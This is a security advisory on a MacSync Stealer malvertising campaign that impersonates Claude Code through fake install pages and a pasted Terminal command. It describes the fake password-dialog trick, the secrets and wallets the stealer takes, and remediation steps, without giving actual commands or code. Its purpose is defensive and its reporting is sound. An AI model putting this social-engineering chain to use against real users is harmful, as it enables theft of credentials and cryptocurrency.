A fresh MacSync Stealer campaign is abusing developer interest in Claude Code through sponsored Google results and fake installation flows. Beelzebub Labs says the campaign impersonates Anthropic’s Claude Code CLI, sends victims to a Google Sites lure, and pushes a terminal command that delivers MacSync Stealer v1.1.2 with the campaign build tag claude1 [1].
The important twist is the user journey. The victim is not only sent to a random download page. The lure teaches the user to copy a command into Terminal, primes them to expect an admin-password prompt, and then uses an AppleScript payload to display a fake System Preferences dialog. If the user enters the Mac login password, the stealer can unlock local secrets that a normal browser-download scam would not reach.
This fits a broader InstallFix/ClickFix pattern that has already targeted people searching for Claude Code and other AI tools. Bitdefender previously documented fake Claude Code install pages that used pasted terminal commands to deliver macOS stealers, showing that AI developer tooling is now a regular malvertising theme rather than a one-off lure [2].
Gridinsoft has seen the same trust-abuse pattern in related stories, including a fake Claude AI site pushing a Windows backdoor, a fake OpenAI Hugging Face repository delivering infostealer malware, and AI-themed Noodlophile Stealer campaigns. The platform changes, but the attacker workflow stays consistent: borrow a trusted AI brand, create a believable install moment, then turn the user’s own action into execution.
What Mac users should check after a fake install
Beelzebub’s analysis says MacSync targeted browser profiles, Firefox/Gecko data, more than 80 wallet extensions, more than 20 desktop wallets, macOS Keychains, iCloud Keychain local data, SSH keys, AWS credentials, Kubernetes configuration, Telegram Desktop sessions, Apple Notes data, shell history, and selected document/key files. It also described a second stage that replaces app.asar inside Ledger Live or Ledger Wallet to show a fake recovery flow and capture seed phrases [1].
That means the response should not stop at deleting a suspicious file. If a Claude Code install command was pasted into Terminal, check ~/.zsh_history, ~/.bash_history, recent Terminal sessions, login items, browser extension directories, ~/Library/Keychains/, ~/.ssh/, ~/.aws/, ~/.kube/, and any recently modified Ledger Live or wallet application files. A fake error message after the command is not proof that installation failed; it may be the cover screen shown after theft.
The credential priority is clear. Rotate developer and cloud access first: GitHub tokens, SSH keys, AWS access keys, Kubernetes contexts, package registry tokens, password-manager sessions, browser sync sessions, and any credentials stored in browsers. For crypto wallets, move funds to wallets created on a clean device if a seed phrase, wallet extension, Ledger Live app, or recovery prompt was exposed. Reinstalling the wallet app is not enough if the seed phrase was typed into a fake recovery flow.
The prevention rule is also concrete: official developer tools should not require copying an opaque one-line installer from a search ad into Terminal. Use vendor documentation reached from a manually typed domain, inspect shell scripts before execution, avoid sponsored results for security-sensitive installs, and treat any macOS password dialog that appears immediately after a pasted install command as a compromise signal until proven otherwise.
Related context: newer macOS stealer lures now include SHub Reaper fake login flows, where the handoff from a browser page to a local action is the main warning sign.
